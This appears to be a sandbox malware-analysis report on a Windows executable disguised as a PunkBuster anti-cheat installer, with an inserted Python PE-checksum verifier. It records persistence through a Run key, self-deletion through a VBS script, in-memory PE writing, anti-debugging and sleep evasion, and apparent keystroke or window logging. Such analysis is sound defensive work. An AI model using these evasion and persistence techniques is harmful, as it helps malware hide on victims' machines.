              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.
              Source: 4wECQoBvYC.exe | String found in binary or memory: Stopping PnkBstrKCould not query the PnkBstrK driverPnkBstrKChecking PnkBstrK driver statusReceiving version from PnkBstrBSending version packet to PnkBstrB **ERROR: Could not read PnkBstrB port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.Getting port for PnkBstrBCHANGED (%ld)
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: Could not read PnkBstrA port registry entry. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.PortGetting port for PnkBstrANOT RUNNING
              Source: 4wECQoBvYC.exe | String found in binary or memory: PnkBstrB file not found **ERROR: The version of PnkBstrA installed on your system is outdated. Please first uninstall and re-install using this application. If you still have problems, please contact Even Balance at http://www.evenbalance.com/ for further support.OUTDATED (%ld)
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-prompts command-line switch.
              Source: 4wECQoBvYC.exe | String found in binary or memory: **ERROR: You must specify install or un-install when using the no-display command-line switch. **ERROR: You must specify install or un-install when using the no-prompts command-line switch.q2.8 (no debug,ANSI,Visual C++,wx containers,compatible with 2.6)your program
              Source: 4wECQoBvYC.exe | String found in binary or memory: Are you sure you want to un-install the PunkBuster Service?
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-Install PunkBuster Service
              Source: 4wECQoBvYC.exe | String found in binary or memory: @PunkBuster Service Setup v%d.%d %s - Step 1 of 2PunkBuster Service Setup v%d.%d %s- Step 1 of 3Are you sure you want to un-install the PunkBuster Service?Un-Install PunkBuster ServiceP Q
              Source: 4wECQoBvYC.exe | String found in binary or memory: Un-installing
              Source: 4wECQoBvYC.exe | String found in binary or memory: @PunkBuster Service Setup v%d.%d %s - Step 3 of 3 - %sPunkBuster Service Setup v%d.%d %s - Step 2 of 2 - %sUn-installingInstalling`!Q
              Source: 4wECQoBvYC.exeString found in binary or memory: This program will help you install or un-install the PunkBuster Anti-cheat service.
              Source: 4wECQoBvYC.exeString found in binary or memory: Un-Install/Remove PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: Install/Re-Install PunkBuster Service
              Source: 4wECQoBvYC.exeString found in binary or memory: &Test ServicesUn-Install/Remove PunkBuster ServiceInstall/Re-Install PunkBuster ServicePunkBuster Service SetupFinished! NOTE: A reboot may be necessary to completely remove the service files.Installation Finished.
              Source: 4wECQoBvYC.exeString found in binary or memory: <!--StartFrag
              Source: 4wECQoBvYC.exeString found in binary or memory: <!--StartFragment -->
              Source: 4wECQoBvYC.exeString found in binary or memory: hAFailed to put data on the clipboardFailed to set clipboard data.<!--EndFragEndFragment<!--StartFragStartFragmentEndHTML%08u<html>StartHTML<!--EndFragment-->
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeFile read: C:\Users\user\Desktop\4wECQoBvYC.exeJump to behavior
              Source: unknownProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs" Jump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wsock32.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: k7rn7l32.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: ntd3ll.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winmm.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: urlmon.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wininet.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: iertutil.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: srvcli.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: netutils.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: sspicli.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: mswsock.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: rasadhlp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: fwpuclnt.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.storage.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: edputil.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: windows.staterepositoryps.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: policymanager.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: msvcp110_win.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: wintypes.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: appresolver.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: bcp47langs.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: slc.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: sppc.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: onecorecommonproxystub.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
              Source: 4wECQoBvYC.exeStatic file information: File size 4087808 > 1048576
              Source: 4wECQoBvYC.exeStatic PE information: Raw size of .data is bigger than: 0x100000 < 0x1a4000
              Source: 4wECQoBvYC.exeStatic PE information: Raw size of .rsrc is bigger than: 0x100000 < 0x117000
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,2_2_000DBCE3
              Source: 4wECQoBvYC.exeStatic PE information: real checksum: 0x2f3a40 should be: 0x3e8ca0
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0048D070 push ecx; mov dword ptr [esp], 00000000h0_2_0048D086
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC0F4 push eax; ret 0_2_004BC112
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BD303 push ecx; ret 0_2_004BD313
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC670 push eax; ret 0_2_004BC684
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_004BC670 push eax; ret 0_2_004BC6AC
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 0_2_0048CFD0 push ecx; mov dword ptr [esp], 00000000h0_2_0048CFE6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_001167E0 push eax; ret 2_2_001167FE
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011B9DD push esi; ret 2_2_0011B9E6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CCDC push esp; retf 0011h2_2_0011CCDD
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD3C pushad ; retf 2_2_0011CD3D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD28 push eax; retf 2_2_0011CD39
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0011CD60 pushad ; retf 2_2_0011CD3D
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_00115EAF push ecx; ret 2_2_00115EC2
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_000F3FF6 push ecx; ret 2_2_000F4009
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0048D070 push ecx; mov dword ptr [esp], 00000000h2_2_0048D086
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC0F4 push eax; ret 2_2_004BC112
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BD303 push ecx; ret 2_2_004BD313
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC670 push eax; ret 2_2_004BC684
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_004BC670 push eax; ret 2_2_004BC6AC
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AEA0 pushfd ; iretd 2_2_0046AEB6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0048CFD0 push ecx; mov dword ptr [esp], 00000000h2_2_0048CFE6
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AFF0 pushfd ; iretd 2_2_0046B085
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AFF0 pushfd ; iretd 2_2_0046B0D3
              Source: C:\Users\user\Desktop\4wECQoBvYC.exeCode function: 2_2_0046AF80 pushfd ; iretd 2_2_0046B085

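The static finding "real checksum: 0x2f3a40 should be: 0x3e8ca0" above means the CheckSum stored in the optional header does not match what the PE checksum algorithm yields for the file on disk. That is a cheap tamper indicator: the linker writes a correct value, and a packer or a loader that appends or patches a payload afterwards rarely fixes it. The following is an added example, not Joe Sandbox code, that reproduces the algorithm (the one documented for IMAGE_OPTIONAL_HEADER.CheckSum and implemented by imagehlp's MapFileAndCheckSum): sum all 16-bit little-endian words of the file with end-around carry, skip the 4-byte CheckSum field itself, fold to 16 bits and add the file length. The sample buffer it runs on is constructed here and is a header skeleton only, not a loadable PE.

```python
import struct

PE_SIGNATURE = b"PE\0\0"
COFF_HEADER_SIZE = 20
CHECKSUM_OFFSET_IN_OPTIONAL_HEADER = 0x40   # same position in PE32 and PE32+


def checksum_field_offset(data: bytes) -> int:
    """Locate IMAGE_OPTIONAL_HEADER.CheckSum by following e_lfanew."""
    if len(data) < 0x40 or data[:2] != b"MZ":
        raise ValueError("not an MZ file")
    e_lfanew = struct.unpack_from("<I", data, 0x3C)[0]
    if data[e_lfanew:e_lfanew + 4] != PE_SIGNATURE:
        raise ValueError("PE signature not found")
    return e_lfanew + 4 + COFF_HEADER_SIZE + CHECKSUM_OFFSET_IN_OPTIONAL_HEADER


def compute_pe_checksum(data: bytes) -> int:
    """PE CheckSum: 16-bit words summed with end-around carry, the CheckSum
    field itself excluded, folded to 16 bits, plus the file length."""
    skip = checksum_field_offset(data)
    total = 0
    for off in range(0, len(data) - 1, 2):
        if off == skip or off == skip + 2:          # the 4 bytes of the field
            continue
        total += struct.unpack_from("<H", data, off)[0]
        total = (total & 0xFFFF) + (total >> 16)     # fold the carry each step
    if len(data) & 1:                                # odd trailing byte
        total += data[-1]
        total = (total & 0xFFFF) + (total >> 16)
    total = (total & 0xFFFF) + (total >> 16)
    return (total & 0xFFFF) + len(data)


def verify(data: bytes):
    """Return (stored, computed, match) so a mismatch can be reported the way
    the sandbox does."""
    stored = struct.unpack_from("<I", data, checksum_field_offset(data))[0]
    computed = compute_pe_checksum(data)
    return stored, computed, stored == computed


def fix_checksum(data: bytes) -> bytes:
    """Write the correct value back (what a linker does after layout)."""
    buf = bytearray(data)
    struct.pack_into("<I", buf, checksum_field_offset(data), compute_pe_checksum(data))
    return bytes(buf)


def build_sample_pe(stored_checksum: int) -> bytes:
    """Constructed 256-byte header skeleton: DOS stub with e_lfanew, PE
    signature, a PE32 optional-header magic and the CheckSum field at 0x98.
    Everything else is zero; it is not a loadable image."""
    buf = bytearray(256)
    buf[0:2] = b"MZ"
    struct.pack_into("<I", buf, 0x3C, 0x40)              # e_lfanew
    buf[0x40:0x44] = PE_SIGNATURE
    struct.pack_into("<H", buf, 0x58, 0x10B)             # optional header magic (PE32)
    struct.pack_into("<I", buf, 0x98, stored_checksum)   # 0x40 + 4 + 20 + 0x40
    return bytes(buf)


if __name__ == "__main__":
    stored, computed, ok = verify(build_sample_pe(0xDEADBEEF))
    print(f"stored checksum: 0x{stored:x}, computed: 0x{computed:x}, match: {ok}")
```

A mismatch on its own is not proof of tampering: Windows only enforces the field for drivers and a few system images, and many unsigned user-mode builds ship with 0. A non-zero wrong value, as here, is the more telling case, because something wrote a checksum and the bytes changed afterwards. Note also how the report's numbers decompose: 0x3e8ca0 minus the 4087808-byte (0x3e6000) file size is 0x2ca0, the folded word sum, which is what the `+ len(data)` term in `compute_pe_checksum` accounts for.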
              Persistence and Installation Behavior

Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6128 ShellExecuteW,URLDownloadToFileW | 2_2_000C6128
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | File created: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D9BC4 OpenSCManagerW,OpenServiceW,CloseServiceHandle,StartServiceW,CloseServiceHandle,CloseServiceHandle,CloseServiceHandle | 2_2_000D9BC4
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Registry value created or modified: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run PerfectouinVans

              Hooking and other Techniques for Hiding and Protection

Source: C:\Windows\SysWOW64\wscript.exe | File deleted: c:\users\user\desktop\4wecqobvyc.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 2_2_000DBCE3
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\wscript.exe | Process information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CE54F Sleep,ExitProcess | 2_2_000CE54F
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: OpenSCManagerA,EnumServicesStatusW,GetLastError,EnumServicesStatusW,OpenServiceW,QueryServiceConfigW,GetLastError,QueryServiceConfigW,CloseServiceHandle,CloseServiceHandle | 2_2_000D98C2
Source: C:\Windows\SysWOW64\wscript.exe | Window found: window name: WSH-Timer
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Window / User API: threadDelayed 2613
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Window / User API: threadDelayed 6867
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Window / User API: foregroundWindowGot 1749
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Dropped PE file which has not been started: C:\Users\user\Documents\Perfectouin\Bin\PerfectouinVans.exe
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | API coverage: 0.4 %
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 528 | Thread sleep count: 232 > 30
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 528 | Thread sleep time: -116000s >= -30000s
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep count: 2613 > 30
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep time: -7839000s >= -30000s
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep count: 6867 > 30
Source: C:\Users\user\Desktop\4wECQoBvYC.exe TID: 5948 | Thread sleep time: -20601000s >= -30000s
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CB335 FindFirstFileA,FindClose,DeleteFileA,GetLastError,DeleteFileA,GetLastError,FindNextFileA,FindClose | 2_2_000CB335
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DB42F FindFirstFileW,FindNextFileW,RemoveDirectoryW,SetFileAttributesW,DeleteFileW,FindClose,RemoveDirectoryW,GetLastError,FindClose | 2_2_000DB42F
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000CB53A FindFirstFileA,FindClose,DeleteFileA,GetLastError,FindNextFileA,FindClose,FindClose | 2_2_000CB53A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_0010D5E9 FindFirstFileExA | 2_2_0010D5E9
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C89A9 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,FindClose,__CxxThrowException@8 | 2_2_000C89A9
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C7A8C __EH_prolog,FindFirstFileW,FindNextFileW,FindClose,__CxxThrowException@8 | 2_2_000C7A8C
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6AC2 FindFirstFileW,FindNextFileW | 2_2_000C6AC2
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D8C69 FindFirstFileW,FindNextFileW,FindNextFileW | 2_2_000D8C69
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C8DA7 __EH_prolog,FindFirstFileW,FindNextFileW,FindClose | 2_2_000C8DA7
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000C6F06 SetEvent,GetFileAttributesW,DeleteFileW,ShellExecuteW,GetLogicalDriveStringsA,SetFileAttributesW,DeleteFileA,Sleep,StrToIntA,CreateDirectoryW | 2_2_000C6F06
Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200600896.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW[O
Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp, 4wECQoBvYC.exe, 00000002.00000003.2200600896.0000000001B3A000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Hyper-V RAW
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | API call chain: ExitProcess graph end node | graph_2-59743
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FA65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_000FA65D
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000DBCE3 LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,LoadLibraryA,GetProcAddress | 2_2_000DBCE3
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_00102554 mov eax, dword ptr fs:[00000030h] | 2_2_00102554
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_0010E92E GetProcessHeap | 2_2_0010E92E
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process created: C:\Users\user\Desktop\4wECQoBvYC.exe "C:\Users\user\Desktop\4wECQoBvYC.exe"
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F4168 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess | 2_2_000F4168
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000FA65D IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_000FA65D
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F3B44 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter | 2_2_000F3B44
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F3CD7 SetUnhandledExceptionFilter | 2_2_000F3CD7

              HIPS / PFW / Operating System Protection Evasion

Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Memory written: C:\Users\user\Desktop\4wECQoBvYC.exe base: C0000 value starts with: 4D5A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetCurrentProcessId,OpenMutexA,CloseHandle,CreateThread,CloseHandle,Sleep,OpenProcess, svchost.exe | 2_2_000D0F36
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000D8754 mouse_event | 2_2_000D8754
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Process created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\ukiglbypimmphepyxgwyogkqxgydyyk.vbs"
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 0_2_0040906B AllocateAndInitializeSid,CheckTokenMembership,FreeSid | 0_2_0040906B
Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp, registros.dat.2.dr | Binary or memory string: [2024/12/09 16:42:26 Program Manager]
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagerD
Source: 4wECQoBvYC.exe, 00000002.00000002.3272233299.0000000001AC8000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program ManagersInfos
Source: registros.dat.2.dr | Binary or memory string: [2024/12/09 16:42:19 Program Manager]
Source: registros.dat.2.dr | Binary or memory string: [2024/12/09 16:42:08 Program Manager]
Source: 4wECQoBvYC.exe, 00000002.00000003.2200531420.0000000001B25000.00000004.00000020.00020000.00000000.sdmp | Binary or memory string: Program Managerz
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: 2_2_000F3E0A cpuid | 2_2_000F3E0A
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoA | 2_2_000CE679
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoW | 2_2_001110BA
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: EnumSystemLocalesW | 2_2_001070AE
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP | 2_2_001111E3
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoW | 2_2_001112EA
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW | 2_2_001113B7
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: GetLocaleInfoW | 2_2_00107597
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW | 2_2_00110A7F
Source: C:\Users\user\Desktop\4wECQoBvYC.exe | Code function: EnumSystemLocalesW | 2_2_00110CF7
